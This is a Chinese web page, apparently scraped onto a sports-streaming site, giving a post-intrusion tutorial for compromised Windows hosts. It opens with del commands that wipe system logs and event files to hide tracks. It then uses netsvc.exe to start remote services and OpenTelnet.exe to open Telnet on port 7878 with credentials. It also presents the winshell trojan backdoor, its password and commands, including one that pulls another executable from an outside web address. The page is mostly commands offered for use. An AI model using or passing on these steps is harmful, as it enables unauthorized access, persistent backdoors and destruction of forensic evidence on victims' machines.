168体育-全网最权威热门体育赛事直播免费在线平台

  • loading

    Loading

    168体育 办公运维服务

    扫尾netsvc.exe,OpenTelnet.exe,winshell.exe

    字数: (748)
    阅读: (12578)
    0

    扫尾:

    del C:/winnt/system32/logfiles/*.*

    del C:/winnt/ssytem32/config/*.evt

    del C:/winnt/system32/dtclog/*.*

    del C:/winnt/system32/*.log

    del C:/winnt/system32/*.txt

    del C:/winnt/*.txt

    del C:/winnt/*.log

    一、netsvc.exe

    下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:

    netsvc /list //IP地址

    netsvc schedule //IP地址 /query

    netsvc //IP地址 schedule /start

    二、OpenTelnet.exe

    远程启动主机的Telnet服务,并绑定端口到7878,例如:

    OpenTelnet //IP地址 用户名 密码 1 7878

    然后就可以telnet到主机的7878端口,进入DOS方式下:

    telnet IP地址 7878

    三、winshell.exe

    一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD后,可打下面的命令:

    p Path (查看winshell主程序的路径信息

    b reBoot (重新启动机器)

    d shutDown (关闭机器)

    s Shell (执行后你就会看到可爱的“C:/”)

    x eXit (退出本次登录会话,此命令并不终止winshell的运行)

    CMD http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)

    本文发布于2012年12月29日12:20,已经过了4582天,若内容或图片失效,请留言反馈

    转载请注明出处: 网际网

    本文的链接地址: /ruanjing/345.html

    评论列表:
    评论本文(0)
    empty

    暂无评论

    【网站地图】【sitemap】